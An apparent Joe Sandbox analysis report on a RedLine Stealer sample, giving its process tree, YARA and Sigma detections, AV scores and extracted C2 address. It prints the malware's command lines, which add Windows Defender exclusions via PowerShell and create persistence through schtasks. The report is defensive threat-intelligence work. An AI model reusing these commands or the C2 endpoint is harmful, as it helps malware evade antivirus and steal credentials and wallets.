Edit tour

Windows Analysis Report
w4XFffGDz1.exe

Overview

General Information

Sample name:	w4XFffGDz1.exe renamed because original name is a hash value
Original sample name:	2185ecde5380054ad075b7a25ae0ea51.exe
Analysis ID:	1457840
MD5:	2185ecde5380054ad075b7a25ae0ea51
SHA1:	caa1b832574fc3050af5f97b6deabc21398b5c47
SHA256:	e1a01751d2ea4682e211983eb7d6d1f01876a1199ba8eb9f04e3b8594f2ee199
Tags:	exeRedLineStealer
Infos:

Detection

RedLine

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Yara detected AntiVM3

Yara detected RedLine Stealer

.NET source code contains potential unpacker

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Suspicious Script Execution From Temp Folder

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

Uses known network protocols on non-standard ports

Uses schtasks.exe or at.exe to add and modify task schedules

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

File is packed with WinRar

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains sections with non-standard names

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

w4XFffGDz1.exe (PID: 6412 cmdline: "C:\Users\user\Desktop\w4XFffGDz1.exe" MD5: 2185ECDE5380054AD075B7A25AE0EA51)

PO.exe (PID: 7532 cmdline: "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe" MD5: 86F98523CEB67DF5CC3431A839F63134)

powershell.exe (PID: 7780 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7812 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 5020 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 7908 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AJzHYZtQIb" /XML "C:\Users\user\AppData\Local\Temp\tmp61B0.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

PO.exe (PID: 8068 cmdline: "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe" MD5: 86F98523CEB67DF5CC3431A839F63134)

conhost.exe (PID: 8080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

AJzHYZtQIb.exe (PID: 8164 cmdline: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe MD5: 86F98523CEB67DF5CC3431A839F63134)

schtasks.exe (PID: 8028 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AJzHYZtQIb" /XML "C:\Users\user\AppData\Local\Temp\tmp8574.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

AJzHYZtQIb.exe (PID: 5404 cmdline: "C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe" MD5: 86F98523CEB67DF5CC3431A839F63134)

conhost.exe (PID: 7848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

Threatname: RedLine

{"C2 url": ["45.137.22.67:55615"], "Bot Id": "cheat"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_RedLine_1	Yara detected RedLine Stealer	Joe Security
dump.pcap	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
0000000E.00000002.2274416687.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000E.00000002.2274416687.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000000E.00000002.2274416687.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x133ca:$a4: get_ScannedWallets 0x12228:$a5: get_ScanTelegram 0x1304e:$a6: get_ScanGeckoBrowsersPaths 0x10e6a:$a7: <Processes>k__BackingField 0xed7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1079e:$a9: <ScanFTP>k__BackingField
00000015.00000002.2357626482.0000000002FF0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000010.00000002.2247047739.0000000004AFD000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000010.00000002.2247047739.0000000004AFD000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000010.00000002.2247047739.0000000004AFD000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x133ba:$a4: get_ScannedWallets 0x12218:$a5: get_ScanTelegram 0x1303e:$a6: get_ScanGeckoBrowsersPaths 0x10e5a:$a7: <Processes>k__BackingField 0xed6c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1078e:$a9: <ScanFTP>k__BackingField
00000007.00000002.2160567285.000000000453C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.2160567285.000000000453C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000007.00000002.2160567285.000000000453C000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x139ea:$a4: get_ScannedWallets 0x12848:$a5: get_ScanTelegram 0x1366e:$a6: get_ScanGeckoBrowsersPaths 0x1148a:$a7: <Processes>k__BackingField 0xf39c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x10dbe:$a9: <ScanFTP>k__BackingField
0000000E.00000002.2276292357.00000000031D0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000007.00000002.2160567285.0000000003C00000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.2160567285.0000000003C00000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000007.00000002.2160567285.0000000003C00000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x1451a:$a4: get_ScannedWallets 0x2c33a:$a4: get_ScannedWallets 0x13378:$a5: get_ScanTelegram 0x2b198:$a5: get_ScanTelegram 0x1419e:$a6: get_ScanGeckoBrowsersPaths 0x2bfbe:$a6: get_ScanGeckoBrowsersPaths 0x11fba:$a7: <Processes>k__BackingField 0x29dda:$a7: <Processes>k__BackingField 0xfecc:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x27cec:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x118ee:$a9: <ScanFTP>k__BackingField 0x2970e:$a9: <ScanFTP>k__BackingField
Process Memory Space: PO.exe PID: 7532	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: PO.exe PID: 7532	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: PO.exe PID: 7532	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: PO.exe PID: 7532	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x26629:$a4: get_ScannedWallets 0x52ecd:$a4: get_ScannedWallets 0x254d0:$a5: get_ScanTelegram 0x51d74:$a5: get_ScanTelegram 0x262b2:$a6: get_ScanGeckoBrowsersPaths 0x52b56:$a6: get_ScanGeckoBrowsersPaths 0x24163:$a7: <Processes>k__BackingField 0x50a07:$a7: <Processes>k__BackingField 0x21696:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x4df3a:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x23a97:$a9: <ScanFTP>k__BackingField 0x5033b:$a9: <ScanFTP>k__BackingField
Process Memory Space: PO.exe PID: 8068	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: PO.exe PID: 8068	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: PO.exe PID: 8068	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x7eb00:$a4: get_ScannedWallets 0x7d9a7:$a5: get_ScanTelegram 0x7e789:$a6: get_ScanGeckoBrowsersPaths 0x7c63a:$a7: <Processes>k__BackingField 0x79b6d:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x7bf6e:$a9: <ScanFTP>k__BackingField
Process Memory Space: AJzHYZtQIb.exe PID: 8164	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: AJzHYZtQIb.exe PID: 8164	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: AJzHYZtQIb.exe PID: 8164	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x24d84:$a4: get_ScannedWallets 0x23c2b:$a5: get_ScanTelegram 0x24a0d:$a6: get_ScanGeckoBrowsersPaths 0x228be:$a7: <Processes>k__BackingField 0x1fdf1:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x221f2:$a9: <ScanFTP>k__BackingField
Process Memory Space: AJzHYZtQIb.exe PID: 5404	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: AJzHYZtQIb.exe PID: 5404	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Click to see the 21 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
7.2.PO.exe.3c18d70.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.PO.exe.3c18d70.3.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
7.2.PO.exe.3c00f50.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.PO.exe.3c18d70.3.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x117ca:$a4: get_ScannedWallets 0x10628:$a5: get_ScanTelegram 0x1144e:$a6: get_ScanGeckoBrowsersPaths 0xf26a:$a7: <Processes>k__BackingField 0xd17c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0xeb9e:$a9: <ScanFTP>k__BackingField
7.2.PO.exe.3c00f50.4.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
7.2.PO.exe.3c18d70.3.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0xe68a:$u7: RunPE 0x11d41:$u8: DownloadAndEx 0x7330:$pat14: , CommandLine: 0x11279:$v2_1: ListOfProcesses 0xe88b:$v2_2: get_ScanVPN 0xe92e:$v2_2: get_ScanFTP 0xf61e:$v2_2: get_ScanDiscord 0x1060c:$v2_2: get_ScanSteam 0x10628:$v2_2: get_ScanTelegram 0x106ce:$v2_2: get_ScanScreen 0x11416:$v2_2: get_ScanChromeBrowsersPaths 0x1144e:$v2_2: get_ScanGeckoBrowsersPaths 0x11709:$v2_2: get_ScanBrowsers 0x117ca:$v2_2: get_ScannedWallets 0x117f0:$v2_2: get_ScanWallets 0x11810:$v2_3: GetArguments 0xfed9:$v2_4: VerifyUpdate 0x147ea:$v2_4: VerifyUpdate 0x11bca:$v2_5: VerifyScanRequest 0x112c6:$v2_6: GetUpdates 0x147cb:$v2_6: GetUpdates
7.2.PO.exe.3c00f50.4.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x117ca:$a4: get_ScannedWallets 0x10628:$a5: get_ScanTelegram 0x1144e:$a6: get_ScanGeckoBrowsersPaths 0xf26a:$a7: <Processes>k__BackingField 0xd17c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0xeb9e:$a9: <ScanFTP>k__BackingField
7.2.PO.exe.3c00f50.4.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0xe68a:$u7: RunPE 0x11d41:$u8: DownloadAndEx 0x7330:$pat14: , CommandLine: 0x11279:$v2_1: ListOfProcesses 0xe88b:$v2_2: get_ScanVPN 0xe92e:$v2_2: get_ScanFTP 0xf61e:$v2_2: get_ScanDiscord 0x1060c:$v2_2: get_ScanSteam 0x10628:$v2_2: get_ScanTelegram 0x106ce:$v2_2: get_ScanScreen 0x11416:$v2_2: get_ScanChromeBrowsersPaths 0x1144e:$v2_2: get_ScanGeckoBrowsersPaths 0x11709:$v2_2: get_ScanBrowsers 0x117ca:$v2_2: get_ScannedWallets 0x117f0:$v2_2: get_ScanWallets 0x11810:$v2_3: GetArguments 0xfed9:$v2_4: VerifyUpdate 0x147ea:$v2_4: VerifyUpdate 0x11bca:$v2_5: VerifyScanRequest 0x112c6:$v2_6: GetUpdates 0x147cb:$v2_6: GetUpdates
14.2.PO.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
14.2.PO.exe.400000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
14.2.PO.exe.400000.0.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x135ca:$a4: get_ScannedWallets 0x12428:$a5: get_ScanTelegram 0x1324e:$a6: get_ScanGeckoBrowsersPaths 0x1106a:$a7: <Processes>k__BackingField 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1099e:$a9: <ScanFTP>k__BackingField
14.2.PO.exe.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers 0x135ca:$v2_2: get_ScannedWallets 0x135f0:$v2_2: get_ScanWallets 0x13610:$v2_3: GetArguments 0x11cd9:$v2_4: VerifyUpdate 0x165ea:$v2_4: VerifyUpdate 0x139ca:$v2_5: VerifyScanRequest 0x130c6:$v2_6: GetUpdates 0x165cb:$v2_6: GetUpdates
7.2.PO.exe.3c18d70.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.PO.exe.3c18d70.3.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
7.2.PO.exe.3c18d70.3.raw.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x135ca:$a4: get_ScannedWallets 0x12428:$a5: get_ScanTelegram 0x1324e:$a6: get_ScanGeckoBrowsersPaths 0x1106a:$a7: <Processes>k__BackingField 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1099e:$a9: <ScanFTP>k__BackingField
7.2.PO.exe.3c18d70.3.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers 0x135ca:$v2_2: get_ScannedWallets 0x135f0:$v2_2: get_ScanWallets 0x13610:$v2_3: GetArguments 0x11cd9:$v2_4: VerifyUpdate 0x165ea:$v2_4: VerifyUpdate 0x139ca:$v2_5: VerifyScanRequest 0x130c6:$v2_6: GetUpdates 0x165cb:$v2_6: GetUpdates
7.2.PO.exe.3c00f50.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.PO.exe.3c00f50.4.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
7.2.PO.exe.3c00f50.4.raw.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x135ca:$a4: get_ScannedWallets 0x2b3ea:$a4: get_ScannedWallets 0x12428:$a5: get_ScanTelegram 0x2a248:$a5: get_ScanTelegram 0x1324e:$a6: get_ScanGeckoBrowsersPaths 0x2b06e:$a6: get_ScanGeckoBrowsersPaths 0x1106a:$a7: <Processes>k__BackingField 0x28e8a:$a7: <Processes>k__BackingField 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x26d9c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x1099e:$a9: <ScanFTP>k__BackingField 0x287be:$a9: <ScanFTP>k__BackingField
7.2.PO.exe.3c00f50.4.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x282aa:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x2b961:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x20f50:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x2ae99:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers 0x135ca:$v2_2: get_ScannedWallets 0x135f0:$v2_2: get_ScanWallets 0x284ab:$v2_2: get_ScanVPN 0x2854e:$v2_2: get_ScanFTP
Click to see the 15 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe, ParentProcessId: 7532, ParentProcessName: PO.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe", ProcessId: 7780, ProcessName: powershell.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe, ParentProcessId: 7532, ParentProcessName: PO.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe", ProcessId: 7780, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AJzHYZtQIb" /XML "C:\Users\user\AppData\Local\Temp\tmp61B0.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AJzHYZtQIb" /XML "C:\Users\user\AppData\Local\Temp\tmp61B0.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe, ParentProcessId: 7532, ParentProcessName: PO.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AJzHYZtQIb" /XML "C:\Users\user\AppData\Local\Temp\tmp61B0.tmp", ProcessId: 7908, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe, ParentProcessId: 7532, ParentProcessName: PO.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe", ProcessId: 7780, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AJzHYZtQIb" /XML "C:\Users\user\AppData\Local\Temp\tmp61B0.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AJzHYZtQIb" /XML "C:\Users\user\AppData\Local\Temp\tmp61B0.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe, ParentProcessId: 7532, ParentProcessName: PO.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AJzHYZtQIb" /XML "C:\Users\user\AppData\Local\Temp\tmp61B0.tmp", ProcessId: 7908, ProcessName: schtasks.exe

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 7.2.PO.exe.3c00f50.4.raw.unpack

Malware Configuration Extractor: RedLine {"C2 url": ["45.137.22.67:55615"], "Bot Id": "cheat"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe	Virustotal: Detection: 58%	Perma Link
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe	Virustotal: Detection: 58%	Perma Link

Multi AV Scanner detection for submitted file

Source: w4XFffGDz1.exe	ReversingLabs: Detection: 68%
Source: w4XFffGDz1.exe	Virustotal: Detection: 67%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: w4XFffGDz1.exe

Joe Sandbox ML: detected

Source: w4XFffGDz1.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: w4XFffGDz1.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:

Binary string: D:\Projects\WinRAR\sfx\build\sfxzip32\Release\sfxzip.pdb source: w4XFffGDz1.exe

Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Code function: 0_2_00174D8A __EH_prolog3_GS,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	0_2_00174D8A
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Code function: 0_2_00188590 __EH_prolog3_GS,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,	0_2_00188590
Source: C:\Users\user\Desktop\w4XFffGDz1.exe	Code function: 0_2_001986E8 FindFirstFileExA,	0_2_001986E8

